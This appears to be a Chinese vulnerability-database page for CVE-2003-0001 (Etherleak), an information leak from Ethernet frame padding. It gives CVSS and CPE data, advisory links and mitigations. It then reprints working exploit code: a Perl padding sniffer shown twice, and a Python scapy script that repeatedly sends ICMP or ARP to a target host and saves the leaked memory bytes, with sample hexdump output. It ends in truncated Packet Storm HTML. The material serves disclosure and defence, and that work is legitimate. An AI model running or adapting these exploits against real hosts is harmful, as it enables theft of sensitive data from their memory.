CVE-2003-0001
CVSS5.0
发布时间 :2003-01-17 00:00:00
修订时间 :2016-12-06 21:59:04
NMCOEPS    

[原文]Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.


[CNNVD]多家厂商网络设备驱动帧填补信息泄露漏洞(CNNVD-200301-027)

        
        网络设备驱动程序在对于小于46字节的包数据会进行填补。
        多个网络设备驱动程序在填补数据包时使用以前的帧缓冲数据,远程攻击者可以利用这个漏洞从受此漏洞影响的设备中获得一些敏感信息。
        Ethernet标准(IEEE 802.3)定义数据包的最小字段为46字节,如果高层协议如IP提供的数据包小于46字节,设备驱动程序必须填充数据段来迎合IEEE 802规定的最小帧大小规定,而填充值一般是NULL数据。但是许多Ethernet设备驱动程序没有正确按照标准实现进行操作,对数据的填充没有使用NULL字节,而重用了以前传输过的帧数据进行填补操作。由于Ethernet帧缓冲区在内核内存空间分配,因此通过分析这些填补数据可以获得一些系统敏感信息。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-200 [信息暴露]

- CPE (受影响的平台与产品)

cpe:/o:netbsd:netbsd:1.6NetBSD 1.6
cpe:/o:netbsd:netbsd:1.5NetBSD 1.5
cpe:/o:linux:linux_kernel:2.4.20Linux Kernel 2.4.20
cpe:/o:microsoft:windows_2000:::server
cpe:/o:netbsd:netbsd:1.5.1NetBSD 1.5.1
cpe:/o:microsoft:windows_2000_terminal_services
cpe:/o:linux:linux_kernel:2.4.14Linux Kernel 2.4.14
cpe:/o:linux:linux_kernel:2.4.3Linux Kernel 2.4.3
cpe:/o:linux:linux_kernel:2.4.13Linux Kernel 2.4.13
cpe:/o:linux:linux_kernel:2.4.2Linux Kernel 2.4.2
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:linux:linux_kernel:2.4.19Linux Kernel 2.4.19
cpe:/o:linux:linux_kernel:2.4.16Linux Kernel 2.4.16
cpe:/o:linux:linux_kernel:2.4.15Linux Kernel 2.4.15
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:linux:linux_kernel:2.4.1Linux Kernel 2.4.1
cpe:/o:linux:linux_kernel:2.4.12Linux Kernel 2.4.12
cpe:/o:linux:linux_kernel:2.4.11Linux Kernel 2.4.11
cpe:/o:linux:linux_kernel:2.4.18Linux Kernel 2.4.18
cpe:/o:linux:linux_kernel:2.4.17Linux Kernel 2.4.17
cpe:/o:linux:linux_kernel:2.4.5Linux Kernel 2.4.5
cpe:/o:linux:linux_kernel:2.4.4Linux Kernel 2.4.4
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:freebsd:freebsd:4.7FreeBSD 4.7
cpe:/o:linux:linux_kernel:2.4.9Linux Kernel 2.4.9
cpe:/o:freebsd:freebsd:4.6FreeBSD 4.6
cpe:/o:linux:linux_kernel:2.4.8Linux Kernel 2.4.8
cpe:/o:freebsd:freebsd:4.5FreeBSD 4.5
cpe:/o:linux:linux_kernel:2.4.10Linux Kernel 2.4.10
cpe:/o:linux:linux_kernel:2.4.7Linux Kernel 2.4.7
cpe:/o:freebsd:freebsd:4.4FreeBSD 4.4
cpe:/o:linux:linux_kernel:2.4.6Linux Kernel 2.4.6
cpe:/o:freebsd:freebsd:4.3FreeBSD 4.3
cpe:/o:freebsd:freebsd:4.2FreeBSD 4.2
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000_terminal_services::sp1
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000_terminal_services::sp2
cpe:/o:netbsd:netbsd:1.5.2NetBSD 1.5.2
cpe:/o:netbsd:netbsd:1.5.3NetBSD 1.5.3
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000:::datacenter_server

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:2665Data Leak in NIC
oval:org.mitre.oval:def:28706Critical Patch Update January 2015
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0001
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0001
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200301-027
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0016.html
(UNKNOWN)  VULNWATCH  20030110 More information regarding Etherleak
http://marc.info/?l=bugtraq&m=104222046632243&w=2
(UNKNOWN)  BUGTRAQ  20030110 More information regarding Etherleak
http://www.atstake.com/research/advisories/2003/a010603-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A010603-1
http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf
(UNKNOWN)  MISC  http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf
http://www.kb.cert.org/vuls/id/412115
(VENDOR_ADVISORY)  CERT-VN  VU#412115
http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
(UNKNOWN)  CONFIRM  http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
http://www.redhat.com/support/errata/RHSA-2003-025.html
(UNKNOWN)  REDHAT  RHSA-2003:025
http://www.redhat.com/support/errata/RHSA-2003-088.html
(UNKNOWN)  REDHAT  RHSA-2003:088
http://www.securityfocus.com/archive/1/archive/1/305335/30/26420/threaded
(UNKNOWN)  BUGTRAQ  20030106 Etherleak: Ethernet frame padding information leakage (A010603-1)
http://www.securityfocus.com/archive/1/archive/1/307564/30/26270/threaded
(UNKNOWN)  BUGTRAQ  20030117 Re: More information regarding Etherleak
http://www.securitytracker.com/id/1031583
(UNKNOWN)  SECTRACK  1031583

- 漏洞信息

多家厂商网络设备驱动帧填补信息泄露漏洞
中危 设计错误
2003-01-17 00:00:00 2005-10-20 00:00:00
远程  
        
        网络设备驱动程序在对于小于46字节的包数据会进行填补。
        多个网络设备驱动程序在填补数据包时使用以前的帧缓冲数据,远程攻击者可以利用这个漏洞从受此漏洞影响的设备中获得一些敏感信息。
        Ethernet标准(IEEE 802.3)定义数据包的最小字段为46字节,如果高层协议如IP提供的数据包小于46字节,设备驱动程序必须填充数据段来迎合IEEE 802规定的最小帧大小规定,而填充值一般是NULL数据。但是许多Ethernet设备驱动程序没有正确按照标准实现进行操作,对数据的填充没有使用NULL字节,而重用了以前传输过的帧数据进行填补操作。由于Ethernet帧缓冲区在内核内存空间分配,因此通过分析这些填补数据可以获得一些系统敏感信息。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时使用SSL,IPSEC,SSH等加密技术来传输敏感数据,但不是完全解决方案,因此填补的数据不一定一直是采用以前的帧缓冲区数据,也可能是一些未加密加密的IP头信息或其他内核内存信息。
        厂商补丁:
        Atstake
        -------
        Atstake已经为此发布了一个安全公告(A010603-1):
        A010603-1:Etherleak: Ethernet frame padding information leakage
        链接:
        http://www.atstake.com/research/advisories/2003/a010603-1.txt

        暂时还没有厂商提供补丁。

- 漏洞信息 (3555)

Ethernet Device Drivers Frame Padding Info Leakage Exploit (Etherleak) (EDBID:3555)
multiple remote
2007-03-23 Verified
0 Jon Hart
N/A [点击下载]
#!/usr/bin/perl -w
# etherleak, code that has been 5 years coming.
#
# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,
# a vulnerability that would be come known as the 'etherleak' bug.  In
# various situations an ethernet frame must be padded to reach a specific
# size or fall on a certain boundary.  This task is left up to the driver
# for the ethernet device.  The RFCs state that this padding must consist
# of NULLs.  The bug is that at the time and still to this day, many device
# drivers do not pad will NULLs, but rather pad with unsanitized portions
# of kernel memory, oftentimes exposing sensitive information to remote
# systems or those savvy enough to coerce their targets to do so.
#
# Proof of this can be found by googling for 'warchild and etherleak', or
# by visiting:
#
#  http://lkml.org/lkml/2002/4/27/101
#
# This was ultimately fixed in the Linux kernel, but over time this
# vulnerability reared its head numerous times, but at the core the
# vulnerability was the same as the one I originally published.  The most
# public of these was CVE-2003-0001, which was assigned to address an
# official @stake advisory.
#
# This code can be found its most current form at:
#  
#  http://spoofed.org/files/exploits/etherleak
#
# Jon Hart <jhart@spoofed.org>, March 2007
#

use strict;
use diagnostics;
use warnings;
use Getopt::Long;
use Net::Pcap;
use NetPacket::Ethernet qw(:ALL);
use NetPacket::IP qw(:ALL);

my %opts = ();
my ($iface, $err, $pcap_t, $pcap_save, $filter_string); 

GetOptions( \%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or
            die "Unknown option: $!\n" && &usage();

if (defined($opts{'help'})) {
   &usage();
   exit(0);
}

if (defined($opts{'read'})) {
   $pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err);
   if (!defined($pcap_t)) {
      print("Net::Pcap::open_offline failed: $err\n");
      exit 1;
   }
} else {
   if (defined($opts{'interface'})) {
      $iface = $opts{'interface'};
   } else {
      $iface = Net::Pcap::lookupdev(\$err);
      if (defined($err)) {
         print(STDERR "lookupdev() failed: $err\n");
         exit(1);
      } else {
         print(STDERR "No interface specified.  Using $iface\n");
      }
   }

   $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err);
   if (!defined($pcap_t)) {
      print("Net::Pcap::open_live failed on $iface: $err\n");
      exit 1;
   }
}

my $filter;
if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {
   printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t));
   exit(1);
}

if (Net::Pcap::setfilter($pcap_t, $filter) == -1) {
   printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t));
   exit(1);
}

if (defined($opts{'write'})) {
   $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});
   if (!defined($pcap_save)) {
      printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t));
      exit(1);
   }
}

Net::Pcap::loop($pcap_t, -1, \&process, "foo");
Net::Pcap::close($pcap_t);

if (defined($opts{'write'})) {
   Net::Pcap::dump_close($pcap_save);
}



sub process {
   my ($user, $hdr, $pkt) = @_;
   my ($link, $ip);
   my $jump = 0;

   my $datalink = Net::Pcap::datalink($pcap_t);
   if    ($datalink == 1) { $jump += 14; }
   elsif ($datalink == 113) { $jump += 16; }
   else { printf("Skipping datalink $datalink\n"); return; }

   my $l2 = NetPacket::Ethernet->decode($pkt);
   
   if ($l2->{type} == ETH_TYPE_IP) {
      $ip = NetPacket::IP->decode(eth_strip($pkt));
      $jump += $ip->{len};
   } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }
   else { 
      # assume 802.3 ethernet, and just jump ahead the length
      for ($l2->{dest_mac}) {
         if (/^0180c200/) {
            # spanning tree
            # l2->{type} here will actually be the length.  HACK.
            $jump += $l2->{type};
         }
         elsif (/^01000ccccc/) {
            # CDP/VTP/DTP/PAgP/UDLD/PVST, etc
            # l2->{type} here will actually be the length.  HACK.
            $jump += $l2->{type};
         } elsif (/^ab0000020000/) {
            # DEC-MOP-Remote-Console
            return;
         } else {
            # loopback
            if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }
            printf("Skipping datalink $datalink l2 type %s\n", $l2->{type}); return;
         }
      }
   }


   if ($hdr->{len} > $jump) {
      my $trailer_bin = substr($pkt, $jump);
      my $trailer_hex = "";
      my $trailer_ascii = "";
      foreach (split(//, $trailer_bin)) {
         $trailer_hex .= sprintf("%02x", ord($_));
         if (ord($_) >= 32 && ord($_) <= 126) {
            $trailer_ascii .= $_;
         } else { $trailer_ascii .= "."; }
      }
      # ignore all trailers that are just single characters repeated.
      # most OS' use 0, F, 5 or a.
      unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) {
         unless ($opts{'quiet'}) {
            print("#"x80, "\n");
            printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac});
            if ($l2->{type} == ETH_TYPE_IP) {
               printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip});
            }
         }
         print("$trailer_hex\t$trailer_ascii\n");
         if (defined($opts{'write'})) {
            Net::Pcap::dump($pcap_save, $hdr, $pkt);
         }
      }
   }
}

sub usage {
   print <<EOF;
$0 -- A demonstration of the infamous 'etherleak' bug.

   CVE-2003-0001, and countless repeats of the same vulnerability.

   Options:
   [-h|--help]                  # this message
   [-i|--interface] <interface> # interface to listen on
   [-f|--filter] <pcap filter>  # apply this filter to the traffic
   [-r|--read] <path to pcap>   # read from this saved pcap file
   [-w|--write] <path to pcap>  # write tothis saved pcap file
   [-q|--quiet]                 # be quiet
   [-v|--verbose]               # be verbose

EOF


}

# milw0rm.com [2007-03-23]
		

- 漏洞信息 (22131)

Linux Kernel 2.0.x/2.2.x/2.4.x,FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure (EDBID:22131)
unix remote
2007-03-23 Verified
0 Jon Hart
N/A [点击下载]
source: http://www.securityfocus.com/bid/6535/info

Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers.

Frames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.

Cisco has stated that the IOS 12.1 and 12.2 trains are not affected.

National Semiconductor Ethernet controller chips are not vulnerable to this issue. 

#!/usr/bin/perl -w
# etherleak, code that has been 5 years coming.
#
# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,
# a vulnerability that would be come known as the 'etherleak' bug.  In
# various situations an ethernet frame must be padded to reach a specific
# size or fall on a certain boundary.  This task is left up to the driver
# for the ethernet device.  The RFCs state that this padding must consist
# of NULLs.  The bug is that at the time and still to this day, many device
# drivers do not pad will NULLs, but rather pad with unsanitized portions
# of kernel memory, oftentimes exposing sensitive information to remote
# systems or those savvy enough to coerce their targets to do so.
#
# Proof of this can be found by googling for 'warchild and etherleak', or
# by visiting:
#
#  http://lkml.org/lkml/2002/4/27/101
#
# This was ultimately fixed in the Linux kernel, but over time this
# vulnerability reared its head numerous times, but at the core the
# vulnerability was the same as the one I originally published.  The most
# public of these was CVE-2003-0001, which was assigned to address an
# official @stake advisory.
#
# This code can be found its most current form at:
#  
#  http://spoofed.org/files/exploits/etherleak
#
# Jon Hart <jhart@spoofed.org>, March 2007
#

use strict;
use diagnostics;
use warnings;
use Getopt::Long;
use Net::Pcap;
use NetPacket::Ethernet qw(:ALL);
use NetPacket::IP qw(:ALL);

my %opts = ();
my ($iface, $err, $pcap_t, $pcap_save, $filter_string); 

GetOptions( \%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or
            die "Unknown option: $!\n" && &usage();

if (defined($opts{'help'})) {
   &usage();
   exit(0);
}

if (defined($opts{'read'})) {
   $pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err);
   if (!defined($pcap_t)) {
      print("Net::Pcap::open_offline failed: $err\n");
      exit 1;
   }
} else {
   if (defined($opts{'interface'})) {
      $iface = $opts{'interface'};
   } else {
      $iface = Net::Pcap::lookupdev(\$err);
      if (defined($err)) {
         print(STDERR "lookupdev() failed: $err\n");
         exit(1);
      } else {
         print(STDERR "No interface specified.  Using $iface\n");
      }
   }

   $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err);
   if (!defined($pcap_t)) {
      print("Net::Pcap::open_live failed on $iface: $err\n");
      exit 1;
   }
}

my $filter;
if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {
   printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t));
   exit(1);
}

if (Net::Pcap::setfilter($pcap_t, $filter) == -1) {
   printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t));
   exit(1);
}

if (defined($opts{'write'})) {
   $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});
   if (!defined($pcap_save)) {
      printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t));
      exit(1);
   }
}

Net::Pcap::loop($pcap_t, -1, \&process, "foo");
Net::Pcap::close($pcap_t);

if (defined($opts{'write'})) {
   Net::Pcap::dump_close($pcap_save);
}



sub process {
   my ($user, $hdr, $pkt) = @_;
   my ($link, $ip);
   my $jump = 0;

   my $datalink = Net::Pcap::datalink($pcap_t);
   if    ($datalink == 1) { $jump += 14; }
   elsif ($datalink == 113) { $jump += 16; }
   else { printf("Skipping datalink $datalink\n"); return; }

   my $l2 = NetPacket::Ethernet->decode($pkt);
   
   if ($l2->{type} == ETH_TYPE_IP) {
      $ip = NetPacket::IP->decode(eth_strip($pkt));
      $jump += $ip->{len};
   } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }
   else { 
      # assume 802.3 ethernet, and just jump ahead the length
      for ($l2->{dest_mac}) {
         if (/^0180c200/) {
            # spanning tree
            # l2->{type} here will actually be the length.  HACK.
            $jump += $l2->{type};
         }
         elsif (/^01000ccccc/) {
            # CDP/VTP/DTP/PAgP/UDLD/PVST, etc
            # l2->{type} here will actually be the length.  HACK.
            $jump += $l2->{type};
         } elsif (/^ab0000020000/) {
            # DEC-MOP-Remote-Console
            return;
         } else {
            # loopback
            if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }
            printf("Skipping datalink $datalink l2 type %s\n", $l2->{type}); return;
         }
      }
   }


   if ($hdr->{len} > $jump) {
      my $trailer_bin = substr($pkt, $jump);
      my $trailer_hex = "";
      my $trailer_ascii = "";
      foreach (split(//, $trailer_bin)) {
         $trailer_hex .= sprintf("%02x", ord($_));
         if (ord($_) >= 32 && ord($_) <= 126) {
            $trailer_ascii .= $_;
         } else { $trailer_ascii .= "."; }
      }
      # ignore all trailers that are just single characters repeated.
      # most OS' use 0, F, 5 or a.
      unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) {
         unless ($opts{'quiet'}) {
            print("#"x80, "\n");
            printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac});
            if ($l2->{type} == ETH_TYPE_IP) {
               printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip});
            }
         }
         print("$trailer_hex\t$trailer_ascii\n");
         if (defined($opts{'write'})) {
            Net::Pcap::dump($pcap_save, $hdr, $pkt);
         }
      }
   }
}

sub usage {
   print <<EOF;
$0 -- A demonstration of the infamous 'etherleak' bug.

   CVE-2003-0001, and countless repeats of the same vulnerability.

   Options:
   [-h|--help]                  # this message
   [-i|--interface] <interface> # interface to listen on
   [-f|--filter] <pcap filter>  # apply this filter to the traffic
   [-r|--read] <path to pcap>   # read from this saved pcap file
   [-w|--write] <path to pcap>  # write tothis saved pcap file
   [-q|--quiet]                 # be quiet
   [-v|--verbose]               # be verbose

EOF


}

# milw0rm.com [2007-03-23]
		

- 漏洞信息 (26076)

Cisco ASA < 8.4.4.6|8.2.5.32 Ethernet Information Leak (EDBID:26076)
2013-06-10 Not Verified
prdelka
N/A [点击下载]
#!/usr/bin/env python
# CVE-2003-0001 'Etherleak' exploit
# =================================
# Exploit for hosts which use a network device driver that pads 
# ethernet frames with data which vary from one packet to another, 
# likely taken from kernel memory, system memory allocated to 
# the device driver, or a hardware buffer on its network interface 
# card. Exploit uses scapy with either ICMP or ARP requests as 
# this can trigger with either but ICMP can hit layer3 filtering 
# rules. Using ARP the padding appears to leak only fixed constant 
# values when exploited, ICMP leaks random bytes. 
#
# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky
# WARNING: No route found for IPv6 destination :: (no default route?)
# [ CVE-2003-0001 'Etherleak' exploit
# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex
# ............................................................^C!Killing
# !Killing
# root@bt:~/0d# hexdump -C leaky | head
# 00000000  e6 bd a6 9b 90 eb 44 f5  18 a5 29 2a 16 5a 08 ff  |......D...)*.Z..|
# 00000010  43 e1 23 07 8f 96 5a 24  3f 3d 33 7d b4 97 7e 18  |C.#...Z$?=3}..~.|
# 00000020  05 c9 7c 2c a5 c0 fa 7a  76 f3 51 c0 fe 07 72 32  |..|,...zv.Q...r2|
# 00000030  9e ad 6a 67 ad 43 58 17  60 43 bc 2b b8 fb cc 70  |..jg.CX.`C.+...p|
# 00000040  99 92 80 84 03 03 6f 8f  18 d3 5b 5e f0 1e 3a 83  |......o...[^..:.|
# 00000050  3d 82 e7 cd 3e 1f 31 74  b0 06 8c a2 7e 14 6b fb  |=...>.1t....~.k.|
# 00000060  72 9b ac 64 74 9b a4 d9  23 5b 92 82 0d 0b 31 f0  |r..dt...#[....1.|
# 00000070  a9 4f dd 3f bf 2b 5c 67  6c 22 fa da d0 2b d6 39  |.O.?.+\gl"...+.9|
# 00000080  40 58 13 4f 3d bb 48 03  d3 53 3c 5c 44 d2 3d b2  |@X.O=.H..S<\D.=.|
# 00000090  4f f2 a9 4a 02 80 4e 1b  6c bd 69 89 bd 76 1b 0a  |O..J..N.l.i..v..|
#
# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference
# is CSCua88376 and PSIRT-0669464365.
#
#  -- prdelka
#
import os
import sys
import signal
import binascii
from scapy.all import *

def signalhandler(signal,id):
	print "!Killing"
	sys.exit(0)

def spawn(host,type):
	if type == 'arp':
		send(ARP(pdst=host),loop=1,nofilter=1)
	elif type == 'icmp':
		send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)		

if __name__ == "__main__":
	print "[ CVE-2003-0001 'Etherleak' exploit"
	signal.signal(signal.SIGINT,signalhandler)
	if len(sys.argv) < 4:
		print "[ No! Use with <host> <arp|icmp> <file>"
		sys.exit(1)
	type = sys.argv[2]
	if type == 'arp':
		pass
	elif type == 'icmp':
		pass
	else:
		print "Bad type!"
		sys.exit(0)
	pid = os.fork()
	if(pid):
		print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3])
		spawn(sys.argv[1],sys.argv[2])
	while True:
		if type == 'arp':
			myfilter = "host %s and arp" % sys.argv[1]
		elif type == 'icmp':
			myfilter = "host %s and icmp" % sys.argv[1]
		x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))
		p = x[0]
		if type == 'arp':
			pad = p.getlayer(2)
		if type == 'icmp':
			pad = p.getlayer(4)
		leak =  str(pad)
		hexfull = binascii.b2a_hex(leak)
		file = "%s.hex"%sys.argv[3]
		fdesc = open(file,"a")
		fdesc.write(hexfull + "\n")
		fdesc.close()
		# 32 bits leaked here for me.
		if type == 'icmp':
			bytes = leak[9:13]
		elif type == 'arp':
			bytes = leak[10:14]
		fdesc = open(sys.argv[3],"ab")
		fdesc.write(bytes)
		fdesc.close()		

- 漏洞信息 (F30783)

RHSA-2003:025-20.txt (PacketStormID:F30783)
2003-02-05 00:00:00
Red Hat Security  redhat.com
kernel
linux,redhat
CVE-2003-0001
[点击下载]

Red Hat Security Advisory RHSA-2003:025-20 - Updated kernel packages for Red Hat Linux 7.1, 7.2, 7.3, and 8.0 have been made available that fix an information leak from several ethernet drivers (reported by Atstake), and a file system issue.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-type" content="text/html;charset=utf-8" />
<title>RHSA-2003:025-20.txt ≈ Packet Storm</title>
<meta name="description" content="Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers" />
<meta name="keywords" content="security,exploit,advisory,whitepaper,xss,csrf,overflow,scanner,vulnerability" />
<link rel="shortcut icon" href="/img/pss.ico" />
<link rel="stylesheet" media="screen,print,handheld" href="http://packetstatic.com/css1366870159/pss.css" type="text/css" />
<!--[if lt ie 8]><link rel="stylesheet" type="text/css" href="http://packetstatic.com/css1366870159/ie.css" /><![endif]-->
<script type="text/javascript" src="http://packetstatic.com/js1366870155/pt.js"></script>
<script type="text/javascript" src="http://packetstatic.com/js1366870155/pss.js"></script>
<link rel="search" type="application/opensearchdescription+xml" href="http://packetstormsecurity.com/opensearch.xml" title="Packet Storm Site Search" />
<link rel="alternate" type="application/rss+xml" title="Packet Storm Headlines" href="http://rss.packetstormsecurity.com/news/" />
<link rel="alternate" type="application/rss+xml" title="Packet Storm Recent Files" href="http://rss.packetstormsecurity.com/files/" />
<link rel="alternate" type="application/rss+xml" title="Packet Storm Exploits" href="http://rss.packetstormsecurity.com/files/tags/exploit/" />
<link rel="alternate" type="application/rss+xml" title="Packet Storm Advisories" href="http://rss.packetstormsecurity.com/files/tags/advisory/" />
</head>
<body id="files">
<div id="t">
   <div id="tc">
      <a id="top" href="/"><img src="http://packetstatic.com/img1353978071/ps_logo.png" width="315" height="65" id="logo" alt="packet storm" /></a>
      <div id="slogan">what you don't know can hurt you
</div>
      <div id="account"><a href="https://packetstormsecurity.com/account/register/">Register</a> | <a href="https://packetstormsecurity.com/account/login/">Login</a></div>
      <div id="search">
        <form method="get" action="/search/"><input type="text" name="q" id="q" maxlength="120" value="Search …" /><button type="submit"></button><div id="q-tabs"><label for="s-files" class="on">Files</label><label for="s-news">News</label><label for="s-users">Users</label><label for="s-authors">Authors</label><input type="radio" value="files" name="s" id="s-files" /><input type="radio" value="news" name="s" id="s-news" /><input type="radio" value="users" name="s" id="s-users" /><input type="radio" value="authors" name="s" id="s-authors" /></div></form>
      </div>
   </div>
    <div id="tn"><div id="tnc">
        <a href="/" id="tn-home"><span>Home</span></a> <a href="/files/" id="tn-files"><span>Files</span></a> <a href="/news/" id="tn-news"><span>News</span></a> <a href="/about/" id="tn-about"><span>About</span></a> <a href="/contact/" id="tn-contact"><span>Contact</span></a> <a href="/submit/" id="tn-submit"><span>Add New</span></a>
    </div></div>
    <div id="tn2"></div>
</div>

<div id="c">

 <div id="cc">
     <div id="m">
    

    
    
    
     
    <div class="h1"><h1>RHSA-2003:025-20.txt</h1></div>
<dl id="F30783" class="file first">
<dt><a class="ico text-plain" href="/files/download/30783/RHSA-2003%3A025-20.txt" title="Size: 12.9 KB"><strong>RHSA-2003:025-20.txt</strong></a></dt>
<dd class="datetime">Posted <a href="/files/date/2003-02-05/" title="10:23:51 UTC">Feb  5, 2003</a></dd>
<dd class="refer">Authored by <a href="/files/author/2536/" class="person">Red Hat Security</a> | Site <a href="http://www.redhat.com/support/errata">redhat.com</a></dd>
<dd class="detail"><p>Red Hat Security Advisory RHSA-2003:025-20 - Updated kernel packages for Red Hat Linux 7.1, 7.2, 7.3, and 8.0 have been made available that fix an information leak from several ethernet drivers (reported by Atstake), and a file system issue.</p></dd>
<dd class="tags"><span>tags</span> | <a href="/files/tags/kernel">kernel</a></dd>
<dd class="os"><span>systems</span> | <a href="/files/os/linux">linux</a>, <a href="/files/os/redhat">redhat</a></dd>
<dd class="cve"><span>advisories</span> | <a href="/files/cve/CVE-2003-0001">CVE-2003-0001</a></dd>
<dd class="md5"><span>MD5</span> | <code>ad4bcd14084f3d01eb9e28be1f56df4e</code></dd>
<dd class="act-links"><a href="/files/download/30783/RHSA-2003%3A025-20.txt" title="Size: 12.9 KB" rel="nofollow">Download</a> | <a href="/files/favorite/30783/" class="fav" rel="nofollow">Favorite</a> | <a href="/files/30783/RHSA-2003-025-20.txt.html">Comments <span>(0)</span></a></dd>
</dl>
<div id="extra-links"><a href="/files/related/30783/RHSA-2003-025-20.txt.html" id="related">Related Files</a><div id="share">
<h2>Share This</h2>
<ul>
<li><iframe scrolling="no" frameborder="0" allowtransparency="true" style="border: medium none; overflow: hidden; width: 80px; height: 21px;" src="http://www.facebook.com/plugins/like.php?href=http://packetstormsecurity.com/files/30783/RHSA-2003-025-20.txt.html&layout=button_count&show_faces=true&width=250&action=like&font&colorscheme=light&height=21"></iframe></li><li><iframe scrolling="no" frameborder="0" tabindex="0" allowtransparency="true" src="http://platform0.twitter.com/widgets/tweet_button.html?_=1286138321418&count=horizontal&lang=en&text=RHSA-2003:025-20.txt&url=http://packetstormsecurity.com/files/30783/RHSA-2003-025-20.txt.html&via=packet_storm" style="width: 110px; height: 20px;" title="Twitter"></iframe></li><li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http://packetstormsecurity.com/files/30783/RHSA-2003-025-20.txt.html&title=RHSA-2003:025-20.txt&source=Packet+Storm" class="LinkedIn">LinkedIn</a></li><li><a href="http://www.reddit.com/submit?url=http://packetstormsecurity.com/files/30783/RHSA-2003-025-20.txt.html&title=RHSA-2003:025-20.txt" class="Reddit">Reddit</a></li><li><a href="http://digg.com/submit?phase=2&url=http://packetstormsecurity.com/files/30783/RHSA-2003-025-20.txt.html" 